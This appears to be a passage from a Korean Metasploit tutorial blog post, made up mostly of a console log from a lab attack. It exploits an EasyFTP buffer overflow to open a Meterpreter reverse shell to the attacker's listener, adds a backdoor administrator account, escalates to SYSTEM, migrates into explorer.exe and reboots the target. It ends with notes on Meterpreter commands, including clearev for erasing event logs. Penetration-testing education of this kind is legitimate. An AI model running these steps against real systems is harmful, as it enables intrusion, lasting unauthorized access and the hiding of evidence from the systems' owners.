0 Windows Universal - v1.7.0.2
1 Windows Universal - v1.7.0.3
2 Windows Universal - v1.7.0.4
3 Windows Universal - v1.7.0.5
4 Windows Universal - v1.7.0.6
5 Windows Universal - v1.7.0.7
6 Windows Universal - v1.7.0.8
7 Windows Universal - v1.7.0.9
8 Windows Universal - v1.7.0.10
9 Windows Universal - v1.7.0.11
msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(easyftp_cwd_fixret) > set target 9
target => 9
msf exploit(easyftp_cwd_fixret) > set RHOST 192.168.20.203
RHOST => 192.168.20.203
msf exploit(easyftp_cwd_fixret) > set LHOST 192.168.20.50
LHOST => 192.168.20.50
msf exploit(easyftp_cwd_fixret) > show options
Module options (exploit/windows/ftp/easyftp_cwd_fixret):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST 192.168.20.203 yes The target address
RPORT 21 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
9 Windows Universal - v1.7.0.11
msf exploit(easyftp_cwd_fixret) > exploit
[*] Started reverse TCP handler on 192.168.20.50:4444
[*] Prepending fixRet...
[*] Adding the payload...
[*] Overwriting part of the payload with target address...
[*] Sending exploit buffer...
[*] Sending stage (957487 bytes) to 192.168.20.203
[*] Meterpreter session 6 opened (192.168.20.50:4444 -> 192.168.20.203:1056) at 2016-06-01 17:22:08 +0900
meterpreter >
- 백도어 계정 생성 및 계정 권한 상승 실시
meterpreter > shell
Process 1776 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user test test1234 /add (삭제 : net user test /delete)
net user test test1234 /add
C:\WINDOWS\system32>net user
net user
-------------------------------------------------------------------------------
admin Administrator ASPNET
Guest HelpAssistant IUSR_WITH-15B28B4CFD
IWAM_WITH-15B28B4CFD test
C:\WINDOWS\system32>net localgroup administrators test /add
net localgroup administrators test /add
C:\WINDOWS\system32>exit
exit
meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
- 타겟 시스템 재부팅
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
~ 중간 생략 ~
1216 1188 explorer.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\Explorer.EXE
1348 800 wuauclt.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\wuauclt.exe
~ 중간 생략 ~
meterpreter > migrate 1216
[*] Migrating from 1112 to 1216...
[*] Migration completed successfully.
meterpreter >
meterpreter > reboot
Rebooting...
meterpreter >
[*] 192.168.20.203 - Meterpreter session 1 closed. Reason: Died
msf exploit(easyftp_cwd_fixret) >
msf exploit(easyftp_cwd_fixret) > back
msf > exit
- msfdb를 삭제하고 다시 생성한다.
root@kali:~# msfdb delete
root@kali:~#
root@kali:~# msfdb init
[참고] meterpreter 상태
- 'backgrond' 명령어 : msf 프롬프트로 잠시 돌아감
- 'session -i 세션 번호 : 다시 meterpreter 프롬프트로 돌아감
- clearev : 타겟 이벤트 로그 삭제
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
Metasploit - 제1장 메타스플로잇 (metaspliot) https://youtu.be/_7Yc4OM9bjU
'정보보안(구버전) > Metasploit' 카테고리의 다른 글
| Metasploit - 06. 취약점 발견 및 공격 (tikiwiki 취약점 공격) (0) | 2016.06.02 |
|---|---|
| Metasploit - 05. 취약점 발견 및 공격 (MySQL 원격 로그인 시도) (0) | 2016.06.02 |
| Metasploit - 04. 공격 타겟 스캐닝 (0) | 2016.06.02 |
| Metasploit - 03. 외부 스캔 파일 사용하는 방법 (0) | 2016.06.02 |
| Metasploit - 01. 메타스플로잇 (metasploit) (0) | 2016.05.31 |
